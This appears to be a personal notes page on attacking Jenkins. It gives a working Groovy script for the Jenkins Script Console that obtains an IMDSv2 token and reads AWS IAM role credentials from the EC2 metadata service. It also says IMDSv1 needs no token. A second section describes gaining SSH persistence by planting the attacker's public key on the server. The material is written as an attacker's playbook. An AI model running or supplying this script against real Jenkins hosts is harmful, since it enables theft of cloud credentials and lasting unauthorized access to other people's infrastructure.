search
LinkedInGitHubYouTube

Jenkins

Random info about Jenkins

hashtag
Obtain EC2 Credentials from IMDSv2 with Script Console

  • If Jenkins is running on an AWS EC2 instance that has an underlying Instance Profile, it's possible to obtain the credentials by interacting with the IMDS service

  • If IMDSv1 is used, we can achieve the same by querying IMDS without the $TOKEN

// Step 1: Retrieve the IMDSv2 token
def tokenCommand = '''
curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
'''
def tokenProcess = ["bash", "-c", tokenCommand].execute()
def token = tokenProcess.text.trim()

// Step 2: Use the token to fetch IAM role credentials
def metadataCommand = '''
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/<instance-role>
'''.replace('$TOKEN', token) // Inject the token into the command
def metadataProcess = ["bash", "-c", metadataCommand].execute()
def metadataOutput = metadataProcess.text.trim()

// Output the IAM Role credentials
println metadataOutput

hashtag
SSH Persistence with Script Console

  • We can upload our public SSH key to the Jenkins server, allowing us SSH access (provided SSH is enabled)

  • See Create an SSH Key for guidance if needed

Jenkins Script Console - Viewing results of adding public key to jenkins server
PreviousTouchID for SudoNextActive Directory Homelab Automation

Last updated